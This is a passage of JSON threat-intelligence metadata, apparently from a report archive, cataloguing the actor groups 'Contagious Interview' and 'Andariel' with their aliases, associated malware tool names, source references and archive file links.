"source_id": "MISPGALAXY", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434514, "ts_updated_at": 1775826784, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/92b0c6c15f45346d730ce5b3b637fc63987040cc.pdf", "text": "https://archive.orkl.eu/92b0c6c15f45346d730ce5b3b637fc63987040cc.txt", "img": "https://archive.orkl.eu/92b0c6c15f45346d730ce5b3b637fc63987040cc.jpg" } }